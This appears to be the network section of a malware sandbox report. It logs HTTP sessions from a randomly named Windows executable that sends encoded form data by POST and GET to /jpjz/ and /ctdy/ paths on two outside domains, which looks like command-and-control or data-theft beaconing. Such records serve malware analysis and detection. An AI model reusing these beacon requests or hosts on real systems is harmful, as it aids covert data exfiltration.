                                                                      Jan 13, 2025 15:13:36.621742964 CET1236INData Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                      Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
                                                                      Jan 13, 2025 15:13:36.621753931 CET1236INData Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77
                                                                      Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
                                                                      Jan 13, 2025 15:13:36.621767044 CET104INData Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67
                                                                      Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,
                                                                      Jan 13, 2025 15:13:36.621779919 CET1236INData Raw: 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35
                                                                      Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
                                                                      Jan 13, 2025 15:13:36.621835947 CET884INData Raw: 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63
                                                                      Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.849734134.122.135.48801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:42.519197941 CET761OUTPOST /jpjz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Origin: http://www.jrcov55qgcxp5fwa.top
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6e 69 76 66 44 2b 49 74 6b 2b 39 75 44 7a 34 77 6d 6e 6c 75 54 44 6b 32 33 57 6c 47 2f 7a 70 78 37 5a 72 6d 79 56 69 77 7a 55 4f 50 31 7a 31 51 4d 46 72 52 77 69 68 2f 6f 56 68 4b 4a 6f 65 57 78 4e 62 59 6a 34 58 64 66 53 57 67 4a 62 7a 58 59 6a 32 47 6a 70 32 71 69 54 75 64 6d 47 61 54 4e 66 57 52 39 67 61 65 4c 75 57 65 47 7a 64 72 43 5a 42 4a 4f 4e 62 6f 34 4c 41 6b 48 6d 58 50 6a 77 4c 4a 78 4c 53 64 48 35 36 31 76 71 5a 62 55 66 7a 64 74 6a 4e 4e 76 73 6a 46 6b 71 4a 62 77 46 74 7a 4f 48 44 74 2f 50 64 62 42 31 2f 47 77 48 48 44 59 70 66 68 71 55 63 3d
                                                                      Data Ascii: 60q4=Muqh5VPLPtCMnivfD+Itk+9uDz4wmnluTDk23WlG/zpx7ZrmyViwzUOP1z1QMFrRwih/oVhKJoeWxNbYj4XdfSWgJbzXYj2Gjp2qiTudmGaTNfWR9gaeLuWeGzdrCZBJONbo4LAkHmXPjwLJxLSdH561vqZbUfzdtjNNvsjFkqJbwFtzOHDt/PdbB1/GwHHDYpfhqUc=
                                                                      Jan 13, 2025 15:13:43.444924116 CET306INHTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:13:43 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.849735134.122.135.48801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:45.068336964 CET781OUTPOST /jpjz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Origin: http://www.jrcov55qgcxp5fwa.top
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 35 78 36 38 58 6d 7a 51 4f 77 6d 55 4f 50 74 6a 31 52 52 31 72 4b 77 69 6b 4b 6f 51 5a 4b 4a 6f 4b 57 78 50 7a 59 6a 72 2f 53 65 43 57 69 46 37 7a 56 57 44 32 47 6a 70 32 71 69 54 37 56 6d 47 53 54 52 2b 6d 52 76 53 79 64 49 75 57 64 48 7a 64 72 55 70 42 4e 4f 4e 61 4c 34 4f 5a 35 48 6a 54 50 6a 31 6e 4a 79 61 53 65 65 4a 36 7a 72 71 59 50 54 2f 2b 47 73 55 30 6f 73 4d 6a 39 76 35 31 48 78 7a 63 5a 55 6c 4c 72 38 50 31 77 42 32 58 77 31 77 61 72 43 4b 50 52 30 44 4c 75 44 46 38 44 37 63 46 67 35 69 47 41 42 6d 36 41 66 2f 74 42
                                                                      Data Ascii: 60q4=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/m5x68XmzQOwmUOPtj1RR1rKwikKoQZKJoKWxPzYjr/SeCWiF7zVWD2Gjp2qiT7VmGSTR+mRvSydIuWdHzdrUpBNONaL4OZ5HjTPj1nJyaSeeJ6zrqYPT/+GsU0osMj9v51HxzcZUlLr8P1wB2Xw1warCKPR0DLuDF8D7cFg5iGABm6Af/tB
                                                                      Jan 13, 2025 15:13:46.013258934 CET306INHTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:13:45 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.849736134.122.135.48801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:47.606415987 CET1798OUTPOST /jpjz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Origin: http://www.jrcov55qgcxp5fwa.top
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 78 78 37 4f 76 6d 79 33 61 77 67 6b 4f 50 6c 44 31 4d 52 31 72 4c 77 69 63 52 6f 51 6c 30 4a 74 4f 57 77 75 54 59 30 4b 2f 53 51 43 57 69 4e 62 7a 57 59 6a 32 54 6a 70 6d 6d 69 54 72 56 6d 47 53 54 52 38 2b 52 74 41 61 64 4f 75 57 65 47 7a 64 6e 43 5a 42 70 4f 4e 7a 77 34 4f 55 4f 48 51 72 50 67 56 33 4a 30 6f 36 65 57 4a 36 78 6d 4b 59 48 54 2f 79 6a 73 55 42 58 73 50 2f 62 76 35 4e 48 38 46 68 34 4a 6d 33 57 68 39 39 44 5a 47 66 33 31 77 65 55 63 72 54 71 75 52 58 50 41 67 30 57 35 66 30 68 75 31 69 4d 63 41 4b 70 51 61 46 50 64 2b 6b 74 58 53 63 42 72 54 30 45 4a 54 70 2b 72 75 31 44 44 4b 37 69 33 43 57 47 59 38 30 72 59 71 4f 6c 76 47 49 44 58 42 7a 62 53 33 70 2b 34 4e 4b 35 44 4a 47 4c 4a 4d 2b 38 4d 4b 44 47 39 63 38 69 67 36 6c 37 59 53 44 6b 50 59 4b 69 53 30 75 4e 4d 6a 41 71 42 77 42 62 66 6a 6a 76 7a 43 61 4b 2f 6f 7a 36 47 36 6b 7a 50 75 6d 64 6d [TRUNCATED]
                                                                      Data Ascii: 60q4=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/mxx7Ovmy3awgkOPlD1MR1rLwicRoQl0JtOWwuTY0K/SQCWiNbzWYj2TjpmmiTrVmGSTR8+RtAadOuWeGzdnCZBpONzw4OUOHQrPgV3J0o6eWJ6xmKYHT/yjsUBXsP/bv5NH8Fh4Jm3Wh99DZGf31weUcrTquRXPAg0W5f0hu1iMcAKpQaFPd+ktXScBrT0EJTp+ru1DDK7i3CWGY80rYqOlvGIDXBzbS3p+4NK5DJGLJM+8MKDG9c8ig6l7YSDkPYKiS0uNMjAqBwBbfjjvzCaK/oz6G6kzPumdmmwNN+H44e8zYNqLbPrhS3Cw90jHOJPacEAbxiqOvrOwHHntBbwiS83oCce2xtZlpOsGRIUYrI25tQ4qkGSggHBxW0rKpNYWoNpDpB3DjrM2YnUGoySnN6Kbeb7hAQzJ5oyi1/pNxGyK2EZR/kYDqV9vxF5SQYfeGI/S+zQZNAlqOLBzKe7YpzcffSgAY+bfkPGUrZmFGkrCtIGYpPVQQ83Ju2WKr+1rD2pJ2aa2G6dPU+9EfR78uOM5+tpQXE4NQDGbItfsZUveqW+WhQXWTPrv/rDE111+pfsRoryWpMbEqWpozhxvbn/5bpu/mYpo0F/UGmu2tMCHn4UoANSQAF+8BJWbejQ+wbZjeKPVp/hARFdszAaaNq9mdt9wJoXmevjGkyfALggRARoFjXaDrW1ZbsoB7u1EHmWcvkz4JuyJ05ABleYp+AXngO5jxQFRrtB+LvKgAb5UteJkNQEV9SNuv0kFrYkS70XS/RY51YhjLus2SQ+q56VKra6+NAEq57afsUIKrJrIAg7dV986qzFRfOhDMxzkKsP5VIVbOI67l8reDCh3yOU/car3uKPW+K2MLnifl6FFfu5lDRbrzWNuEHKpfSX66F4qfDwednzbjgogcUpd8R3ZmZsiR90BN1vnjAQGoExli6taX2paQveOqtVENksnXh+ [TRUNCATED]
                                                                      Jan 13, 2025 15:13:48.566893101 CET306INHTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:13:48 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.849737134.122.135.48801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:50.161183119 CET490OUTGET /jpjz/?60q4=BsCB6j6XIP/wuAb0HPY9posnISoRnnooDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcVCqIKu7QdDn5nrP80R2HqmHJKcPW9CiGC+2tegxRRJIzTA==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:13:51.067569971 CET306INHTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:13:50 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.84973847.83.1.90801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:56.131113052 CET734OUTPOST /ctdy/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.adadev.info
                                                                      Origin: http://www.adadev.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.adadev.info/ctdy/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 4c 30 76 4c 7a 51 4e 4d 74 49 65 4e 79 2b 6f 49 4b 58 5a 53 6d 48 63 2b 49 6a 57 39 4c 4f 7a 42 51 38 61 4c 55 31 38 49 48 71 78 67 51 4c 69 6b 54 6c 4b 31 43 32 31 45 74 46 71 63 6f 67 6f 67 51 51 57 43 47 69 51 37 50 52 30 53 31 32 6f 7a 36 30 2f 74 39 4a 39 32 48 2b 65 48 45 46 68 30 6e 49 45 6a 36 4f 4c 70 4e 64 2f 30 43 66 48 31 50 6a 43 36 66 44 41 4b 4f 42 5a 35 78 4d 6a 62 33 74 44 31 37 56 57 5a 77 75 71 30 34 45 52 55 48 70 78 2b 4a 2f 74 53 72 64 6a 47 6c 6e 77 4d 53 4e 70 4e 70 36 35 6e 69 50 54 56 53 47 44 45 66 74 30 79 35 56 6b 63 72 48 63 3d
                                                                      Data Ascii: 60q4=0anqji6gQT7yL0vLzQNMtIeNy+oIKXZSmHc+IjW9LOzBQ8aLU18IHqxgQLikTlK1C21EtFqcogogQQWCGiQ7PR0S12oz60/t9J92H+eHEFh0nIEj6OLpNd/0CfH1PjC6fDAKOBZ5xMjb3tD17VWZwuq04ERUHpx+J/tSrdjGlnwMSNpNp65niPTVSGDEft0y5VkcrHc=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.84973947.83.1.90801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:58.674967051 CET754OUTPOST /ctdy/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.adadev.info
                                                                      Origin: http://www.adadev.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.adadev.info/ctdy/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 58 42 54 64 71 4c 56 30 38 49 45 71 78 67 59 72 69 6c 4e 56 4b 36 43 78 38 6e 74 45 57 63 6f 67 73 67 51 52 6d 43 47 54 51 38 4f 42 30 51 38 57 6f 78 6e 6b 2f 74 39 4a 39 32 48 2b 4c 69 45 46 70 30 6d 37 73 6a 36 76 4c 75 4f 64 2f 7a 53 50 48 31 59 7a 43 45 66 44 41 34 4f 45 6b 69 78 4f 72 62 33 73 7a 31 36 45 57 65 36 75 71 32 6c 30 51 49 58 4a 51 72 49 5a 42 68 33 65 37 63 6b 30 34 56 65 62 59 6e 7a 59 78 68 68 50 37 2b 53 46 72 79 61 61 70 61 6a 32 30 73 31 51 4c 67 6c 39 2b 36 33 59 71 71 44 77 32 64 55 2b 77 4d 72 66 58 7a
                                                                      Data Ascii: 60q4=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8XBTdqLV08IEqxgYrilNVK6Cx8ntEWcogsgQRmCGTQ8OB0Q8Woxnk/t9J92H+LiEFp0m7sj6vLuOd/zSPH1YzCEfDA4OEkixOrb3sz16EWe6uq2l0QIXJQrIZBh3e7ck04VebYnzYxhhP7+SFryaapaj20s1QLgl9+63YqqDw2dU+wMrfXz
                                                                      Jan 13, 2025 15:14:00.275341988 CET137INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 13 Jan 2025 14:14:00 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.84974047.83.1.90801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:01.378740072 CET1771OUTPOST /ctdy/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.adadev.info
                                                                      Origin: http://www.adadev.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.adadev.info/ctdy/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 66 42 54 75 79 4c 55 58 6b 49 46 71 78 67 62 72 69 6f 4e 56 4b 6a 43 33 55 37 74 45 61 6d 6f 6a 59 67 66 54 65 43 41 6e 38 38 48 42 30 51 2b 57 6f 77 36 30 2f 34 39 4a 74 36 48 2b 62 69 45 46 70 30 6d 2b 6f 6a 38 2b 4c 75 49 64 2f 30 43 66 48 51 50 6a 43 2f 66 44 6f 6f 4f 46 30 79 79 2f 4c 62 32 4d 6a 31 35 32 75 65 79 75 71 77 31 6b 51 41 58 4a 64 37 49 59 70 74 33 64 6e 69 6b 30 77 56 63 38 78 75 70 4d 67 2b 6a 66 37 55 4c 31 76 4e 5a 71 4e 6b 73 67 77 78 31 43 44 6a 6f 4c 53 57 2f 37 4c 6c 42 79 75 56 4b 4b 74 57 6c 59 79 73 38 6d 6b 72 46 39 53 6e 2b 4d 58 71 39 6f 55 6c 33 61 5a 6e 39 30 57 78 4f 47 4b 31 69 57 75 6a 56 41 56 66 38 50 35 34 76 61 2f 68 42 65 6b 47 33 37 46 6b 79 4a 48 66 34 76 4d 67 66 58 68 79 35 38 72 33 6b 49 4d 67 48 65 6c 31 34 65 65 4b 70 31 37 4f 33 42 59 54 75 31 61 68 70 31 58 66 51 78 7a 4d 36 77 49 79 70 32 50 34 6e 46 50 64 30 [TRUNCATED]
                                                                      Data Ascii: 60q4=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8fBTuyLUXkIFqxgbrioNVKjC3U7tEamojYgfTeCAn88HB0Q+Wow60/49Jt6H+biEFp0m+oj8+LuId/0CfHQPjC/fDooOF0yy/Lb2Mj152ueyuqw1kQAXJd7IYpt3dnik0wVc8xupMg+jf7UL1vNZqNksgwx1CDjoLSW/7LlByuVKKtWlYys8mkrF9Sn+MXq9oUl3aZn90WxOGK1iWujVAVf8P54va/hBekG37FkyJHf4vMgfXhy58r3kIMgHel14eeKp17O3BYTu1ahp1XfQxzM6wIyp2P4nFPd0n2WgsG+WFzoZkDYBcxD991hm15GkHeaiYTWlqeAB02Cb5liJ9UbOgqC5OrBA1ZZMrP7Nc+O2yZOM9GzBI1a0PFwczqDkKhS76gCpFsqNMhKGFXcArr7aTpfn66sve7hefCxJGJtWoi2fC9NlRxGBQWIwpt4zsTi5LzBBI8YWU5pPjBpqM4rErJWWGqE6AZ/WrXn2rRsgjWAkYQ38QyK1yltyD0E7Z2ObCFnXEVQVyo/HFJ0kx3EoKqZ3w+drJByPtSMDqKLmVBQpzp3TndgCRJ68EFLr4WN7hxm39IfjQTPCzyZtalGI4+qgdd1lRhEkHp5SMhmEyWi8P2apnpl9hFjzlS+9btu3pRMeDbLbDm2pOvAdY1ZF9ggswEq5JWbckNa5CFhm9m1cfBSZRmVgxKqB9bCAQxiNzk0nzmuO/VdOi2h400x6T/nYMc7NDr/mRHd2YNGBZreSh6IVocjyQnZD/r1xP+RP+AYRcAFNraX3bF6aNF8bVzvp5oyb2HbziGEgPpU08NIF8o+VlN+q1hWOG0hhHzD0GxkWlEIk6Vm30S6d1jhxkoNpR8s4BTm8bgkoV2qXKzU0xObiv1h9mK5LF7bCuvj0raU2GPifgECewVhEDn6pqsfpptAjNw4kJBk9K2dH7dMQQTpPMHObB4iFMMBi0JWXMp [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.84974147.83.1.90801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:03.930385113 CET481OUTGET /ctdy/?XxGx=INH0eLoh&60q4=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFRMH0zJP+kybsKdAAfaCKHAM6Zo7ldb4F8fWSMfSKwbdMw== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
